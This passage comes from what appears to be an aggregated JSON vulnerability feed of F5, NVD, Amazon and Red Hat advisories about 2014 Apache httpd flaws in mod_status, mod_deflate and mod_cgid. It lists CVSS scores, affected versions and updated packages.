{"f5": [{"lastseen": "2016-03-19T09:01:48", "bulletinFamily": "software", "cvelist": ["CVE-2014-0231", "CVE-2014-3523", "CVE-2014-0118", "CVE-2014-0117", "CVE-2014-0226"], "edition": 1, "description": "Recommended action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the table does not list any version in the column, then no upgrade candidate currently exists.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents.\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "modified": "2014-12-04T00:00:00", "published": "2014-12-04T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/800/sol15893.html", "id": "SOL15893", "title": "SOL15893 - Apache HTTP server vulnerabilities CVE-2014-0117, CVE-2014-0118, CVE-2014-0226, CVE-2014-0231, and CVE-2014-3523", "type": "f5", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2020-12-09T19:58:19", "description": "Race condition in the mod_status module in the Apache HTTP Server before 2.4.10 allows remote attackers to cause a denial of service (heap-based buffer overflow), or possibly obtain sensitive credential information or execute arbitrary code, via a crafted request that triggers improper scoreboard handling within the status_handler function in modules/generators/mod_status.c and the lua_ap_scoreboard_worker function in modules/lua/lua_request.c.", "edition": 8, "cvss3": {}, "published": "2014-07-20T11:12:00", "title": "CVE-2014-0226", "type": "cve", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0226"], "modified": "2017-12-09T02:29:00", "cpe": ["cpe:/a:apache:http_server:2.4.1", "cpe:/a:apache:http_server:2.4.2", "cpe:/a:apache:http_server:2.4.8", "cpe:/a:apache:http_server:2.4.3", "cpe:/a:apache:http_server:2.4.9", "cpe:/a:apache:http_server:2.4.6", "cpe:/a:apache:http_server:2.4.7", "cpe:/a:apache:http_server:2.4.4"], "id": "CVE-2014-0226", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0226", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:http_server:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.9:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:58:19", "description": "The deflate_in_filter function in mod_deflate.c in the mod_deflate module in the Apache HTTP Server before 2.4.10, when request body decompression is enabled, allows remote attackers to cause a denial of service (resource consumption) via crafted request data that decompresses to a much larger size.", "edition": 7, "cvss3": {}, "published": "2014-07-20T11:12:00", "title": "CVE-2014-0118", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0118"], "modified": "2017-12-09T02:29:00", "cpe": ["cpe:/a:apache:http_server:2.4.1", "cpe:/a:apache:http_server:2.4.2", "cpe:/a:apache:http_server:2.4.8", "cpe:/a:apache:http_server:2.4.3", "cpe:/a:apache:http_server:2.4.9", "cpe:/a:apache:http_server:2.4.6", "cpe:/a:apache:http_server:2.4.7", "cpe:/a:apache:http_server:2.4.4"], "id": "CVE-2014-0118", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0118", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:apache:http_server:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.9:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:58:19", "description": "The mod_cgid module in the Apache HTTP Server before 2.4.10 does not have a timeout mechanism, which allows remote attackers to cause a denial of service (process hang) via a request to a CGI script that does not read from its stdin file descriptor.", "edition": 7, "cvss3": {}, "published": "2014-07-20T11:12:00", "title": "CVE-2014-0231", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": 
"PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0231"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:apache:http_server:2.2.27", "cpe:/a:apache:http_server:2.2.15", "cpe:/a:apache:http_server:2.2.11", "cpe:/a:apache:http_server:2.4.1", "cpe:/a:apache:http_server:2.2.12", "cpe:/a:apache:http_server:2.2.16", "cpe:/a:apache:http_server:2.2.22", "cpe:/a:apache:http_server:2.4.2", "cpe:/a:apache:http_server:2.2.9", "cpe:/a:apache:http_server:-", "cpe:/a:apache:http_server:2.4.8", "cpe:/a:apache:http_server:2.4.3", "cpe:/a:apache:http_server:2.2.4", "cpe:/a:apache:http_server:2.2.10", "cpe:/a:apache:http_server:2.2.19", "cpe:/a:apache:http_server:2.2.24", "cpe:/a:apache:http_server:2.2.17", "cpe:/a:apache:http_server:2.2.13", "cpe:/a:apache:http_server:2.4.9", "cpe:/a:apache:http_server:2.4.6", "cpe:/a:apache:http_server:2.2.6", "cpe:/a:apache:http_server:2.2.23", "cpe:/a:apache:http_server:2.2.0", "cpe:/a:apache:http_server:2.2.18", "cpe:/a:apache:http_server:2.2.20", "cpe:/a:apache:http_server:2.2.25", "cpe:/a:apache:http_server:2.4.7", "cpe:/a:apache:http_server:2.4.4", "cpe:/a:apache:http_server:2.2.2", "cpe:/a:apache:http_server:2.2.14", "cpe:/a:apache:http_server:2.2.21", "cpe:/a:apache:http_server:2.2.3", "cpe:/a:apache:http_server:2.2.26", "cpe:/a:apache:http_server:2.2.8"], "id": "CVE-2014-0231", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0231", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:apache:http_server:2.2.26:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.27:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.14:*:*:*:*:*:*:*", 
"cpe:2.3:a:apache:http_server:2.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.24:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:-:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.21:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.25:*:*:*:*:*:*:*"]}], "amazon": [{"lastseen": "2020-11-10T12:35:13", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "description": "**Issue Overview:**\n\nA race condition flaw, leading to heap-based buffer overflows, was found in the mod_status httpd module. 
A remote attacker able to access a status page served by mod_status on a server using a threaded Multi-Processing Module (MPM) could send a specially crafted request that would cause the httpd child process to crash or, possibly, allow the attacker to execute arbitrary code with the privileges of the \"apache\" user. ([CVE-2014-0226 __](<https://access.redhat.com/security/cve/CVE-2014-0226>))\n\nA denial of service flaw was found in the way httpd's mod_deflate module handled request body decompression (configured via the \"DEFLATE\" input filter). A remote attacker able to send a request whose body would be decompressed could use this flaw to consume an excessive amount of system memory and CPU on the target system. ([CVE-2014-0118 __](<https://access.redhat.com/security/cve/CVE-2014-0118>))\n\nA denial of service flaw was found in the way httpd's mod_cgid module executed CGI scripts that did not read data from the standard input. A remote attacker could submit a specially crafted request that would cause the httpd child process to hang indefinitely. 
([CVE-2014-0231 __](<https://access.redhat.com/security/cve/CVE-2014-0231>))\n\n \n**Affected Packages:** \n\n\nhttpd\n\n \n**Issue Correction:** \nRun _yum update httpd_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n httpd-tools-2.2.27-1.3.amzn1.i686 \n httpd-devel-2.2.27-1.3.amzn1.i686 \n httpd-2.2.27-1.3.amzn1.i686 \n mod_ssl-2.2.27-1.3.amzn1.i686 \n httpd-debuginfo-2.2.27-1.3.amzn1.i686 \n \n noarch: \n httpd-manual-2.2.27-1.3.amzn1.noarch \n \n src: \n httpd-2.2.27-1.3.amzn1.src \n \n x86_64: \n httpd-tools-2.2.27-1.3.amzn1.x86_64 \n httpd-devel-2.2.27-1.3.amzn1.x86_64 \n mod_ssl-2.2.27-1.3.amzn1.x86_64 \n httpd-2.2.27-1.3.amzn1.x86_64 \n httpd-debuginfo-2.2.27-1.3.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2014-07-31T13:54:00", "published": "2014-07-31T13:54:00", "id": "ALAS-2014-388", "href": "https://alas.aws.amazon.com/ALAS-2014-388.html", "title": "Important: httpd", "type": "amazon", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-10T12:35:02", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "description": "**Issue Overview:**\n\nA race condition flaw, leading to heap-based buffer overflows, was found in the mod_status httpd module. A remote attacker able to access a status page served by mod_status on a server using a threaded Multi-Processing Module (MPM) could send a specially crafted request that would cause the httpd child process to crash or, possibly, allow the attacker to execute arbitrary code with the privileges of the \"apache\" user. ([CVE-2014-0226 __](<https://access.redhat.com/security/cve/CVE-2014-0226>))\n\nA denial of service flaw was found in the way httpd's mod_deflate module handled request body decompression (configured via the \"DEFLATE\" input filter). A remote attacker able to send a request whose body would be decompressed could use this flaw to consume an excessive amount of system memory and CPU on the target system. 
([CVE-2014-0118 __](<https://access.redhat.com/security/cve/CVE-2014-0118>))\n\nA denial of service flaw was found in the way httpd's mod_cgid module executed CGI scripts that did not read data from the standard input. A remote attacker could submit a specially crafted request that would cause the httpd child process to hang indefinitely. ([CVE-2014-0231 __](<https://access.redhat.com/security/cve/CVE-2014-0231>))\n\n \n**Affected Packages:** \n\n\nhttpd24\n\n \n**Issue Correction:** \nRun _yum update httpd24_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n mod24_proxy_html-2.4.10-1.59.amzn1.i686 \n httpd24-2.4.10-1.59.amzn1.i686 \n httpd24-debuginfo-2.4.10-1.59.amzn1.i686 \n mod24_ldap-2.4.10-1.59.amzn1.i686 \n httpd24-tools-2.4.10-1.59.amzn1.i686 \n mod24_ssl-2.4.10-1.59.amzn1.i686 \n httpd24-devel-2.4.10-1.59.amzn1.i686 \n mod24_session-2.4.10-1.59.amzn1.i686 \n \n noarch: \n httpd24-manual-2.4.10-1.59.amzn1.noarch \n \n src: \n httpd24-2.4.10-1.59.amzn1.src \n \n x86_64: \n mod24_proxy_html-2.4.10-1.59.amzn1.x86_64 \n httpd24-tools-2.4.10-1.59.amzn1.x86_64 \n mod24_ldap-2.4.10-1.59.amzn1.x86_64 \n httpd24-2.4.10-1.59.amzn1.x86_64 \n httpd24-debuginfo-2.4.10-1.59.amzn1.x86_64 \n httpd24-devel-2.4.10-1.59.amzn1.x86_64 \n mod24_session-2.4.10-1.59.amzn1.x86_64 \n mod24_ssl-2.4.10-1.59.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2014-07-31T13:56:00", "published": "2014-07-31T13:56:00", "id": "ALAS-2014-389", "href": "https://alas.aws.amazon.com/ALAS-2014-389.html", "title": "Important: httpd24", "type": "amazon", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:44:40", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0118", "CVE-2014-0226", "CVE-2014-0231"], "description": "The httpd packages provide the Apache HTTP Server, a powerful, efficient,\nand extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. 
A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the \"apache\" user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the \"DEFLATE\" input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. (CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon will be restarted automatically.\n", "modified": "2018-06-06T20:24:08", "published": "2014-07-23T04:00:00", "id": "RHSA-2014:0920", "href": "https://access.redhat.com/errata/RHSA-2014:0920", "type": "redhat", "title": "(RHSA-2014:0920) Important: httpd security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:50", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4352", "CVE-2014-0117", "CVE-2014-0118", "CVE-2014-0226", "CVE-2014-0231"], "description": "The httpd packages provide the Apache HTTP Server, a powerful, efficient,\nand extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. 
A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the \"apache\" user. (CVE-2014-0226)\n\nA NULL pointer dereference flaw was found in the mod_cache httpd module.\nA malicious HTTP server could cause the httpd child process to crash when\nthe Apache HTTP Server was used as a forward proxy with caching.\n(CVE-2013-4352)\n\nA denial of service flaw was found in the mod_proxy httpd module. A remote\nattacker could send a specially crafted request to a server configured as a\nreverse proxy using a threaded Multi-Processing Modules (MPM) that would\ncause the httpd child process to crash. (CVE-2014-0117)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the \"DEFLATE\" input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. (CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing the\nupdated packages, the httpd daemon will be restarted automatically.\n", "modified": "2018-04-12T03:33:37", "published": "2014-07-23T04:00:00", "id": "RHSA-2014:0921", "href": "https://access.redhat.com/errata/RHSA-2014:0921", "type": "redhat", "title": "(RHSA-2014:0921) Important: httpd security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:44:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0118", "CVE-2014-0193", "CVE-2014-0226", "CVE-2014-0231", "CVE-2014-3472"], "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the \"apache\" user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the \"DEFLATE\" input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. (CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nA flaw was found in the WebSocket08FrameDecoder implementation that could\nallow a remote attacker to trigger an Out Of Memory Exception by issuing a\nseries of TextWebSocketFrame and ContinuationWebSocketFrames. 
Depending on\nthe server configuration, this could lead to a denial of service.\n(CVE-2014-0193)\n\nIt was found that the isCallerInRole() method of the SimpleSecurityManager\ndid not correctly check caller roles. A remote, authenticated attacker\ncould use this flaw to circumvent the caller check in applications that use\nblack list access control based on caller roles. (CVE-2014-3472)\n\nRed Hat would like to thank James Roper of Typesafe for reporting\nCVE-2014-0193, and CA Technologies for reporting CVE-2014-3472.\n\nThis release of JBoss Enterprise Application Platform also includes bug\nfixes and enhancements. Documentation for these changes will be available\nshortly from the JBoss Enterprise Application Platform 6.3.0 Release Notes,\nlinked to in the References.\n\nAll users who require JBoss Enterprise Application Platform 6.3.0 on Red\nHat Enterprise Linux 6 should install these new packages. The JBoss server\nprocess must be restarted for the update to take effect.\n", "modified": "2018-06-07T02:39:04", "published": "2014-08-06T04:00:00", "id": "RHSA-2014:1020", "href": "https://access.redhat.com/errata/RHSA-2014:1020", "type": "redhat", "title": "(RHSA-2014:1020) Important: Red Hat JBoss Enterprise Application Platform 6.3.0 update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:46", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4590", "CVE-2014-0118", "CVE-2014-0119", "CVE-2014-0226", "CVE-2014-0231"], "description": "Red Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nHTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector\n(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat\nNative library.\n\nThis release serves as a replacement for Red Hat JBoss Web Server 2.0.1,\nand includes several bug fixes. 
Refer to the Red Hat JBoss Web Server 2.1.0\nRelease Notes, linked to in the References section, for information on the\nmost significant of these changes.\n\nThe following security issues are also fixed with this release:\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the \"apache\" user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the \"DEFLATE\" input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. (CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nIt was found that several application-provided XML files, such as web.xml,\ncontent.xml, *.tld, *.tagx, and *.jspx, resolved external entities,\npermitting XML External Entity (XXE) attacks. An attacker able to deploy\nmalicious applications to Tomcat could use this flaw to circumvent security\nrestrictions set by the JSM, and gain access to sensitive information on\nthe system. Note that this flaw only affected deployments in which Tomcat\nis running applications from untrusted sources, such as in a shared hosting\nenvironment. 
(CVE-2013-4590)\n\nIt was found that, in certain circumstances, it was possible for a\nmalicious web application to replace the XML parsers used by Tomcat to\nprocess XSLTs for the default servlet, JSP documents, tag library\ndescriptors (TLDs), and tag plug-in configuration files. The injected XML\nparser(s) could then bypass the limits imposed on XML external entities\nand/or gain access to the XML files processed for other web applications\ndeployed on the same Tomcat instance. (CVE-2014-0119)\n\nAll users of Red Hat JBoss Web Server 2.0.1 on Red Hat Enterprise Linux 5\nare advised to upgrade to Red Hat JBoss Web Server 2.1.0. The JBoss server\nprocess must be restarted for this update to take effect.\n", "modified": "2018-08-09T19:46:59", "published": "2014-08-21T04:00:00", "id": "RHSA-2014:1088", "href": "https://access.redhat.com/errata/RHSA-2014:1088", "type": "redhat", "title": "(RHSA-2014:1088) Important: Red Hat JBoss Web Server 2.1.0 update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:37", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4352", "CVE-2014-0117", "CVE-2014-0118", "CVE-2014-0226", "CVE-2014-0231"], "description": "The httpd packages provide the Apache HTTP Server, a powerful, efficient,\nand extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the \"apache\" user. 
(CVE-2014-0226)\n\nA NULL pointer dereference flaw was found in the mod_cache httpd module.\nA malicious HTTP server could cause the httpd child process to crash when\nthe Apache HTTP Server was used as a forward proxy with caching.\n(CVE-2013-4352)\n\nA denial of service flaw was found in the mod_proxy httpd module. A remote\nattacker could send a specially crafted request to a server configured as a\nreverse proxy using a threaded Multi-Processing Modules (MPM) that would\ncause the httpd child process to crash. (CVE-2014-0117)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the \"DEFLATE\" input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. (CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd24-httpd users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. 
After installing\nthe updated packages, the httpd daemon will be restarted automatically.\n", "modified": "2018-06-13T01:28:21", "published": "2014-07-23T04:00:00", "id": "RHSA-2014:0922", "href": "https://access.redhat.com/errata/RHSA-2014:0922", "type": "redhat", "title": "(RHSA-2014:0922) Important: httpd24-httpd security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-11T13:32:33", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0118", "CVE-2014-0193", "CVE-2014-0226", "CVE-2014-0231", "CVE-2014-3464", "CVE-2014-3472"], "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the \"apache\" user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the \"DEFLATE\" input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. (CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. 
(CVE-2014-0231)\n\nA flaw was found in the WebSocket08FrameDecoder implementation that could\nallow a remote attacker to trigger an Out Of Memory Exception by issuing a\nseries of TextWebSocketFrame and ContinuationWebSocketFrames. Depending on\nthe server configuration, this could lead to a denial of service.\n(CVE-2014-0193)\n\nIt was found that the isCallerInRole() method of the SimpleSecurityManager\ndid not correctly check caller roles. A remote, authenticated attacker\ncould use this flaw to circumvent the caller check in applications that use\nblack list access control based on caller roles. (CVE-2014-3472)\n\nRed Hat would like to thank James Roper of Typesafe for reporting\nCVE-2014-0193, and CA Technologies for reporting CVE-2014-3472.\n\nThis release of JBoss Enterprise Application Platform also includes bug\nfixes and enhancements. Documentation for these changes will be available\nshortly from the JBoss Enterprise Application Platform 6.3.0 Release Notes,\nlinked to in the References.\n\nAll users who require JBoss Enterprise Application Platform 6.3.0 on Red\nHat Enterprise Linux 5 should install these new packages. The JBoss server\nprocess must be restarted for the update to take effect.\n", "modified": "2016-04-04T18:31:13", "published": "2014-08-06T04:00:00", "id": "RHSA-2014:1019", "href": "https://access.redhat.com/errata/RHSA-2014:1019", "type": "redhat", "title": "(RHSA-2014:1019) Important: Red Hat JBoss Enterprise Application Platform 6.3.0 update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-11T13:33:31", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4590", "CVE-2014-0118", "CVE-2014-0119", "CVE-2014-0226", "CVE-2014-0227", "CVE-2014-0231"], "description": "Red Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. 
It is comprised of the Apache\nHTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector\n(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat\nNative library.\n\nThis release serves as a replacement for Red Hat JBoss Web Server 2.0.1,\nand includes several bug fixes. Refer to the Red Hat JBoss Web Server 2.1.0\nRelease Notes, linked to in the References section, for information on the\nmost significant of these changes.\n\nThe following security issues are also fixed with this release:\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the \"apache\" user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the \"DEFLATE\" input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. 